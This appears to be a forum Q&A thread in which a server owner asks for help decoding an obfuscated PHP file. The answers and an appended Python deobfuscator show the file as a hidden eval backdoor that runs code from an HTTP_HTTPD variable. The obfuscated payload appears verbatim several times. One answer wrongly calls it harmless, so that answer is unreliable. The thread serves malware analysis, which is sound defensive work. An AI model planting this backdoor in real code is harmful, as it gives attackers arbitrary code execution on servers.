Suspicious file found on my server

Time: 2014-01-02 19:41:21

Tags: eval virus

I found a suspicious file on my server and I'm trying to decode it and find out what it does.

The code is below; any hints on how to decode it?

<?php if(!function_exists("mystr1s45")){class mystr1s21 { static $mystr1s279="S\x46\x52U\x55F9\x49VFR\x51\x52A\x3d="; static $mystr1s178="b\x61\x73e\x364\x5fde\x63\x6fd\x65"; }eval("e\x76\x61\x6c\x28\x62a\x73e\x364\x5f\x64\x65c\x6f\x64\x65\x28\x27Zn\x56uY\x33Rpb\x324\x67bX\x6czd\x48\x49xcz\x634KC\x52teX\x4e\x30c\x6aF\x7aO\x54\x6bp\x65yR\x37I\x6cx\x34\x4emRc\x65D\x635c1\x78\x34NzR\x79X\x48gz\x4dXNc\x65DMx\x4dVx\x34Mz\x41if\x541t\x65XN\x30cj\x46zMj\x45\x36\x4fi\x52\x37\x49\x6cx\x34NmR\x35\x63\x31\x784Nz\x52y\x4dV\x78\x34\x4ez\x4d\x78Nzg\x69f\x54ty\x5aXR1\x63m4\x67J\x48sib\x58l\x63\x65\x44\x63zd\x46x4N\x7aJce\x44Mxc\x7aF\x63e\x44M\x78MCJ\x39K\x43\x42teX\x4e\x30\x63\x6aFzM\x6a\x456Oi\x527J\x48si\x58Hg\x32ZH\x6c\x63e\x44czd\x48J\x63\x65D\x4dxc\x7a\x6c\x63eDM\x35\x49\x6e19I\x43k\x37\x66Q\x3d\x3d\x27\x29\x29\x3be\x76a\x6c\x28\x62a\x73e\x364\x5f\x64e\x63o\x64\x65\x28\x27ZnV\x75Y3\x52pb\x324\x67b\x58\x6c\x7adHI\x78c\x7a\x51\x31KC\x52\x74eX\x4e0cj\x46zNj\x59\x70IH\x74y\x5aXR1\x63m\x34g\x62Xl\x7ad\x48I\x78czI\x78\x4fj\x6f\x6beyR\x37\x49m1\x35\x58Hg\x33\x4d3Rc\x65D\x63yMX\x4eceD\x4d2\x4e\x69\x4a9f\x54t\x39\x27\x29\x29\x3b");} $mystr1s2235=@getenv(mystr1s78("\x6dys\x74r1s\x3279"));if($mystr1s2235) {@eval($mystr1s2235);} ?>

Thanks,

Alan.

2 answers:

Answer 0 (score: 3)

The php functions you're looking for seem to be a combination of base64_decode and urldecode. For example:

urldecode("\x6d\x79s\x74r\x31s\x311\x30");

gives "mystr1s110"

Also, part of the string that the eval statement base64_decodes:

function mystr1s78($mystr1s99){${"\x6d\x79s\x74r\x31s\x311\x30"}=mystr1s21::${"\x6dys\x74r1\x73178"};return ${"my\x73t\x72\x31s1\x310"}( mystr1s21::${${"\x6dy\x73tr\x31s9\x39"}} );}

These encoded strings are all references to the variables defined earlier, e.g. \x6d\x79s\x74r\x31s\x311\x30 url-decodes to mystr1s110

This looks pretty nasty to me, although I'm not a security expert. I'd just php -a and work out what the decoded chunks are, then reconstruct the code from there.

Side note: you've taken it off the server, right?

Edit:

Got a bit curious about this. After finishing the decoding, I got this:

<?php

if(!function_exists("myFunction2")){

class myClass {
    static $myVar1="SFRUUF9IVFRQRA==";
    static $myVar2="base64_decode";
}

function myFunction1($myArg)
{
    $myVar4=myClass::$myVar2;  // myClass::$myVar2 is just "base64_decode"
    return $myVar4( myClass::${$myArg} );  // returning base64_decode of the argument
}

function myFunction2($myArg2)
{
    return myClass::${$myArg2};
}

}

$myFinalVar=@getenv(myFunction1('myVar1'));   // just gets the env variable named by the base64 decode of myVar1

if($myFinalVar) {
    @eval($myFinalVar);  // executes
}

?>

It looks to me like a script designed to execute a script from another server. (That is, they just need to hit the URL within a URL and it executes. SFRUUF9IVFRQRA== decodes to HTTP_HTTPD, so they could hit http://yourwebsite.com/thisscript.php?HTTP_HTTPD=myscriptaddress.php and run whatever they want on the server.)

Answer 1 (score: 0)

As far as I can tell, this is not a harmful script; in fact, it doesn't do anything useful.

Here is the basis for my comment:

To decode it, you just put the hex string into print_r() as the argument.

print_r("b\x61\x73e\x364\x5fde\x63\x6fd\x65");

The fully decoded code is:

<?php 
if(!function_exists("mystr1s45")){
    class mystr1s21 { 
        static $mystr1s279="SFRUUF9IVFRQRA==";
        static $mystr1s178="base64_decode"; 
    }
    eval(
        eval(
            function mystr1s78($mystr1s99){ // returns 'HTTP_HTTPD'
                ${mystr1s110}=mystr1s21::${mystr1s178};
                return ${mystr1s110}( mystr1s21::${${mystr1s99}} );
            }
        );
        eval(
            function mystr1s45($mystr1s66) {
                return mystr1s21::${${mystr1s66}};
            }
        );
    );
}
$mystr1s2235=@getenv(mystr1s78("mystr1s279"));
if($mystr1s2235) {
    @eval($mystr1s2235);
}
?>

The function mystr1s78 will return 'HTTP_HTTPD'. This is used as an environment variable name whose value is fetched with getenv.

If you run the decoded code, you will face a "Parse error" near the definition of function mystr1s78. This is because eval expects a string, and the string must be a valid code statement (not an expression).

Parse error: syntax error, unexpected 'mystr1s78' (T_STRING), expecting '('

As far as I know, HTTP_HTTPD is not an environment variable set by default by Apache or any web server, and even if it were a variable with some value, passing it to eval wouldn't do anything.

To confirm, you can set the environment variable HTTP_HTTPD as follows:

<?php 
apache_setenv('HTTP_HTTPD',<some_value>);
if(!function_exists("mystr1s45")){class mystr1s21 { static $mystr1s279="S\x46\x52U\x55F9\x49VFR\x51\x52A\x3d="; static $mystr1s178="b\x61\x73e\x364\x5fde\x63\x6fd\x65"; }eval("e\x76\x61\x6c\x28\x62a\x73e\x364\x5f\x64\x65c\x6f\x64\x65\x28\x27Zn\x56uY\x33Rpb\x324\x67bX\x6czd\x48\x49xcz\x634KC\x52teX\x4e\x30c\x6aF\x7aO\x54\x6bp\x65yR\x37I\x6cx\x34\x4emRc\x65D\x635c1\x78\x34NzR\x79X\x48gz\x4dXNc\x65DMx\x4dVx\x34Mz\x41if\x541t\x65XN\x30cj\x46zMj\x45\x36\x4fi\x52\x37\x49\x6cx\x34NmR\x35\x63\x31\x784Nz\x52y\x4dV\x78\x34\x4ez\x4d\x78Nzg\x69f\x54ty\x5aXR1\x63m4\x67J\x48sib\x58l\x63\x65\x44\x63zd\x46x4N\x7aJce\x44Mxc\x7aF\x63e\x44M\x78MCJ\x39K\x43\x42teX\x4e\x30\x63\x6aFzM\x6a\x456Oi\x527J\x48si\x58Hg\x32ZH\x6c\x63e\x44czd\x48J\x63\x65D\x4dxc\x7a\x6c\x63eDM\x35\x49\x6e19I\x43k\x37\x66Q\x3d\x3d\x27\x29\x29\x3be\x76a\x6c\x28\x62a\x73e\x364\x5f\x64e\x63o\x64\x65\x28\x27ZnV\x75Y3\x52pb\x324\x67b\x58\x6c\x7adHI\x78c\x7a\x51\x31KC\x52\x74eX\x4e0cj\x46zNj\x59\x70IH\x74y\x5aXR1\x63m\x34g\x62Xl\x7ad\x48I\x78czI\x78\x4fj\x6f\x6beyR\x37\x49m1\x35\x58Hg\x33\x4d3Rc\x65D\x63yMX\x4eceD\x4d2\x4e\x69\x4a9f\x54t\x39\x27\x29\x29\x3b");} $mystr1s2235=@getenv(mystr1s78("\x6dys\x74r1s\x3279"));if($mystr1s2235) {@eval($mystr1s2235);} 

?>

Let us know if you think this is malicious and could harm the system.
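Both answers decode the file by hand (php -a, print_r). As an added example that is not from the question or either answer, here is a static deobfuscator in Python that resolves the \x escapes, inlines the eval("...") wrapper and decodes the eval(base64_decode('...')) layers without executing any of the PHP, then pulls out the static constants so the HTTP_HTTPD lookup is visible. The regex names and helper functions are my own; the input is the file from the question, and only \x escapes are handled because that is the only escape form this sample uses.

```python
import base64
import re

# The obfuscated file from the question, copied verbatim; it is broken across lines
# here only for readability and re-joined below.
SAMPLE = "".join(r'''
<?php if(!function_exists("mystr1s45")){class mystr1s21 { static $mystr1s279="S\x46\x52U\x55F9
\x49VFR\x51\x52A\x3d="; static $mystr1s178="b\x61\x73e\x364\x5fde\x63\x6fd\x65"; }eval("e\x76
\x61\x6c\x28\x62a\x73e\x364\x5f\x64\x65c\x6f\x64\x65\x28\x27Zn\x56uY\x33Rpb\x324\x67bX\x6czd\x48
\x49xcz\x634KC\x52teX\x4e\x30c\x6aF\x7aO\x54\x6bp\x65yR\x37I\x6cx\x34\x4emRc\x65D\x635c1\x78\x34
NzR\x79X\x48gz\x4dXNc\x65DMx\x4dVx\x34Mz\x41if\x541t\x65XN\x30cj\x46zMj\x45\x36\x4fi\x52\x37\x49
\x6cx\x34NmR\x35\x63\x31\x784Nz\x52y\x4dV\x78\x34\x4ez\x4d\x78Nzg\x69f\x54ty\x5aXR1\x63m4\x67J
\x48sib\x58l\x63\x65\x44\x63zd\x46x4N\x7aJce\x44Mxc\x7aF\x63e\x44M\x78MCJ\x39K\x43\x42teX\x4e\x30
\x63\x6aFzM\x6a\x456Oi\x527J\x48si\x58Hg\x32ZH\x6c\x63e\x44czd\x48J\x63\x65D\x4dxc\x7a\x6c\x63eDM
\x35\x49\x6e19I\x43k\x37\x66Q\x3d\x3d\x27\x29\x29\x3be\x76a\x6c\x28\x62a\x73e\x364\x5f\x64e\x63o
\x64\x65\x28\x27ZnV\x75Y3\x52pb\x324\x67b\x58\x6c\x7adHI\x78c\x7a\x51\x31KC\x52\x74eX\x4e0cj\x46
zNj\x59\x70IH\x74y\x5aXR1\x63m\x34g\x62Xl\x7ad\x48I\x78czI\x78\x4fj\x6f\x6beyR\x37\x49m1\x35\x58
Hg\x33\x4d3Rc\x65D\x63yMX\x4eceD\x4d2\x4e\x69\x4a9f\x54t\x39\x27\x29\x29\x3b");} $mystr1s2235=
@getenv(mystr1s78("\x6dys\x74r1s\x3279"));if($mystr1s2235) {@eval($mystr1s2235);} ?>
'''.split("\n"))

HEX_ESCAPE = re.compile(r"\\x([0-9A-Fa-f]{1,2})")          # PHP \x takes 1 or 2 hex digits
DQ_STRING = re.compile(r'"((?:[^"\\]|\\.)*)"')             # a double-quoted PHP literal
EVAL_STRING = re.compile(r'eval\("((?:[^"\\]|\\.)*)"\)')   # eval("...") with a literal body
EVAL_B64 = re.compile(r"eval\(base64_decode\('([A-Za-z0-9+/=]+)'\)\)")
STATIC_STR = re.compile(r'static\s+\$(\w+)\s*=\s*"([^"]*)"')

def php_unescape(s):
    """Resolve \\xNN escapes the way PHP does inside a double-quoted string."""
    return HEX_ESCAPE.sub(lambda m: chr(int(m.group(1), 16)), s)

def peel_layer(code):
    """One pass: unescape literals, inline eval("..."), decode eval(base64_decode('...'))."""
    code = DQ_STRING.sub(lambda m: '"' + php_unescape(m.group(1)) + '"', code)
    code = EVAL_STRING.sub(lambda m: m.group(1), code)
    return EVAL_B64.sub(lambda m: base64.b64decode(m.group(1)).decode("latin-1"), code)

def deobfuscate(code, max_layers=10):
    """Peel layers until a pass changes nothing; returns every layer for review."""
    layers = [code]
    for _ in range(max_layers):
        nxt = peel_layer(layers[-1])
        if nxt == layers[-1]:
            break
        layers.append(nxt)
    return layers

def static_strings(code):
    """Collect `static $name="value"` literals, where this sample keeps its constants."""
    return dict(STATIC_STR.findall(code))
```

deobfuscate(SAMPLE)[-1] is the readable layer; static_strings() on it returns the two constants, and 'SFRUUF9IVFRQRA==' base64-decodes to HTTP_HTTPD, the environment variable whose value the file passes to eval.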